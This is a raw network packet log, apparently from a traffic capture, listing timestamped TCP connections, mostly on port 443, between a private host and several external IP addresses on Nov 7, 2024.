                                                                Nov 7, 2024 21:40:08.029486895 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.029958010 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.030033112 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.049921036 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.050023079 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.050216913 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.050281048 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.051027060 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.051093102 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.051434040 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.051506996 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.157087088 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.157176018 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.157347918 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.157394886 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.158068895 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.158130884 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.158567905 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.158637047 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.158974886 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.159020901 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.169296026 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.169384003 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.169610023 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.169671059 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.169941902 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.170015097 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.170644045 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.170691013 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.170700073 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.170715094 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.170773029 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.171089888 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.171103954 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.265918970 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.265975952 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.266210079 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.266251087 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.266915083 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.266952038 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.267476082 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.267518997 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.365859032 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:08.367808104 CET49751443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:08.367821932 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:08.368103981 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:08.371845961 CET49751443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:08.371892929 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:08.373523951 CET49751443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:08.384207010 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.384285927 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.384407043 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.384449959 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.384866953 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.384912968 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.385951996 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.386012077 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.386092901 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.386131048 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.419322014 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:08.502935886 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.503035069 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.503104925 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.503153086 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.503160000 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.503187895 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.503443956 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.503452063 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.503468037 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.531574965 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:08.531714916 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:08.531944036 CET49751443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:08.531951904 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:08.531961918 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:08.532005072 CET49751443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:08.532012939 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:08.532054901 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:08.532113075 CET49751443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:08.532742977 CET49751443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:08.532753944 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:09.930181026 CET49752443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:09.930238962 CET44349752188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:09.930319071 CET49752443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:09.930607080 CET49752443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:09.930619955 CET44349752188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:10.365067005 CET4968080192.168.2.16192.229.211.108
                                                                Nov 7, 2024 21:40:10.412049055 CET49678443192.168.2.1620.189.173.10
                                                                Nov 7, 2024 21:40:10.566157103 CET44349752188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:10.566519022 CET49752443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:10.566540956 CET44349752188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:10.567600012 CET44349752188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:10.567717075 CET49752443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:10.568054914 CET49752443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:10.568056107 CET49752443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:10.568124056 CET44349752188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:10.568165064 CET49752443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:10.568198919 CET49752443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:10.568598986 CET49753443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:10.568649054 CET44349753188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:10.568809032 CET49753443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:10.568978071 CET49753443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:10.568989038 CET44349753188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:10.666059971 CET4968080192.168.2.16192.229.211.108
                                                                Nov 7, 2024 21:40:11.195630074 CET44349753188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.195936918 CET49753443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.195960999 CET44349753188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.197823048 CET44349753188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.197900057 CET49753443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.199093103 CET49753443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.199168921 CET44349753188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.199307919 CET49753443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.199318886 CET44349753188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.240048885 CET49753443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.272033930 CET4968080192.168.2.16192.229.211.108
                                                                Nov 7, 2024 21:40:11.348695993 CET44349753188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.348777056 CET44349753188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.348834991 CET49753443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.349335909 CET49753443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.349354029 CET44349753188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.350692987 CET49754443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.350739956 CET44349754188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.350831032 CET49754443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.351169109 CET49754443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.351181984 CET44349754188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.948172092 CET44349754188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.948550940 CET49754443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.948580027 CET44349754188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.949692965 CET44349754188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.949774981 CET49754443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.950068951 CET49754443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.950081110 CET49754443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.950133085 CET49754443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.950140953 CET44349754188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.950201988 CET49754443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.950534105 CET49755443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.950567007 CET44349755188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:11.950653076 CET49755443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.950851917 CET49755443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:11.950866938 CET44349755188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:12.478033066 CET4968080192.168.2.16192.229.211.108
                                                                Nov 7, 2024 21:40:12.593058109 CET44349755188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:12.593470097 CET49755443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:12.593499899 CET44349755188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:12.593843937 CET44349755188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:12.594183922 CET49755443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:12.594269037 CET44349755188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:12.594329119 CET49755443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:12.635337114 CET44349755188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:13.608858109 CET44349719142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:40:13.608927965 CET44349719142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:40:13.609002113 CET49719443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:40:14.114883900 CET49719443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:40:14.114912987 CET44349719142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:40:14.881014109 CET4968080192.168.2.16192.229.211.108
                                                                Nov 7, 2024 21:40:15.217113018 CET49678443192.168.2.1620.189.173.10
                                                                Nov 7, 2024 21:40:16.682084084 CET49673443192.168.2.16204.79.197.203
                                                                Nov 7, 2024 21:40:19.683085918 CET4968080192.168.2.16192.229.211.108
                                                                Nov 7, 2024 21:40:24.820945024 CET49678443192.168.2.1620.189.173.10
                                                                Nov 7, 2024 21:40:29.291996956 CET4968080192.168.2.16192.229.211.108
                                                                Nov 7, 2024 21:40:31.317153931 CET49756443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.317209005 CET44349756188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:31.317312002 CET49756443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.317637920 CET49756443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.317650080 CET44349756188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:31.957683086 CET44349756188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:31.958024025 CET49756443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.958050966 CET44349756188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:31.959069014 CET44349756188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:31.959157944 CET49756443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.959511995 CET49756443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.959527016 CET49756443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.959578037 CET49756443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.959585905 CET44349756188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:31.959644079 CET49756443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.959954977 CET49757443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.959988117 CET44349757188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:31.960097075 CET49757443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.960304022 CET49757443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:31.960313082 CET44349757188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:32.600516081 CET44349757188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:32.600821018 CET49757443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:32.600836992 CET44349757188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:32.601824999 CET44349757188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:32.601932049 CET49757443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:32.602211952 CET49757443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:32.602272987 CET44349757188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:32.602392912 CET49757443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:32.602399111 CET44349757188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:32.655930996 CET49757443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:44.381203890 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:44.381247997 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:44.381350040 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:44.381755114 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:44.381767035 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.120001078 CET4969880192.168.2.16199.232.210.172
                                                                Nov 7, 2024 21:40:45.120135069 CET4969980192.168.2.16199.232.210.172
                                                                Nov 7, 2024 21:40:45.125770092 CET8049698199.232.210.172192.168.2.16
                                                                Nov 7, 2024 21:40:45.125859976 CET4969880192.168.2.16199.232.210.172
                                                                Nov 7, 2024 21:40:45.126457930 CET8049699199.232.210.172192.168.2.16
                                                                Nov 7, 2024 21:40:45.126504898 CET4969980192.168.2.16199.232.210.172
                                                                Nov 7, 2024 21:40:45.487003088 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.487121105 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:45.488570929 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:45.488581896 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.488836050 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.490350962 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:45.535320997 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.864864111 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.864888906 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.864902020 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.865020990 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:45.865047932 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.865066051 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:45.865107059 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:45.980561972 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.980627060 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.980778933 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:45.980803967 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.980834007 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:45.980930090 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:45.980941057 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.980957985 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:45.981085062 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.981118917 CET443497584.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:45.981159925 CET49758443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:51.488795042 CET44349755188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:51.488874912 CET44349755188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:51.488935947 CET49755443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:51.492522001 CET49755443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:51.492533922 CET44349755188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:52.400057077 CET44349757188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:52.400125027 CET44349757188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:52.400226116 CET49757443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:52.400791883 CET49757443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:52.400810003 CET44349757188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:52.401762962 CET49759443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:52.401787043 CET44349759188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:52.401878119 CET49759443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:52.402260065 CET49759443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:52.402271986 CET44349759188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:53.011595964 CET44349759188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:53.011996031 CET49759443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.012016058 CET44349759188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:53.013048887 CET44349759188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:53.013143063 CET49759443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.013411999 CET49759443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.013425112 CET49759443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.013475895 CET44349759188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:53.013478994 CET49759443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.013530016 CET49759443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.013797998 CET49760443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.013859987 CET44349760188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:53.013942957 CET49760443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.014148951 CET49760443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.014162064 CET44349760188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:53.640060902 CET44349760188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:53.640443087 CET49760443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.640458107 CET44349760188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:53.640806913 CET44349760188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:53.641098022 CET49760443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.641165972 CET44349760188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:53.641251087 CET49760443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:53.683334112 CET44349760188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:54.029741049 CET49761443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:54.029793024 CET44349761188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:54.029907942 CET49761443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:54.030220985 CET49761443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:54.030234098 CET44349761188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:54.808828115 CET44349760188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:54.808928013 CET44349760188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:54.808993101 CET49760443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:54.809494972 CET49760443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:54.809513092 CET44349760188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:54.841172934 CET49762443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:54.841202974 CET44349762188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:54.841293097 CET49762443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:54.841510057 CET49762443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:54.841522932 CET44349762188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.465537071 CET44349761188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.465802908 CET49761443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:55.465825081 CET44349761188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.466689110 CET44349761188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.466764927 CET49761443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:55.467034101 CET49761443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:55.467045069 CET49761443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:55.467084885 CET44349761188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.467098951 CET49761443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:55.467127085 CET49761443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:55.467417955 CET49763443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:55.467441082 CET44349763188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.467530012 CET49763443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:55.467710972 CET49763443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:55.467720985 CET44349763188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.495471954 CET44349762188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.495703936 CET49762443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:55.495729923 CET44349762188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.496730089 CET44349762188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.496794939 CET49762443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:55.497050047 CET49762443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:55.497126102 CET44349762188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.497203112 CET49762443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:55.497210026 CET44349762188.114.96.3192.168.2.16
                                                                Nov 7, 2024 21:40:55.542721987 CET49762443192.168.2.16188.114.96.3
                                                                Nov 7, 2024 21:40:56.078099012 CET44349763188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.078432083 CET49763443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.078457117 CET44349763188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.079328060 CET44349763188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.082859993 CET49763443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.083223104 CET49763443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.083277941 CET44349763188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.083647966 CET49763443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.083653927 CET44349763188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.137715101 CET49763443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.233218908 CET44349763188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.233278036 CET44349763188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.233364105 CET49763443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.235850096 CET49763443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.235862970 CET44349763188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.241599083 CET49764443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.241645098 CET44349764188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.241734982 CET49764443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.242074013 CET49764443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.242090940 CET44349764188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.875092030 CET44349764188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.875358105 CET49764443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.875376940 CET44349764188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.876249075 CET44349764188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.876328945 CET49764443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.876637936 CET49764443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.876674891 CET49764443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.876694918 CET44349764188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.876730919 CET49764443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.876779079 CET49764443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.877095938 CET49765443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.877140045 CET44349765188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:56.877203941 CET49765443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.877474070 CET49765443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:56.877487898 CET44349765188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.476702929 CET44349765188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:57.477066994 CET49765443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:57.477092028 CET44349765188.114.97.3192.168.2.16
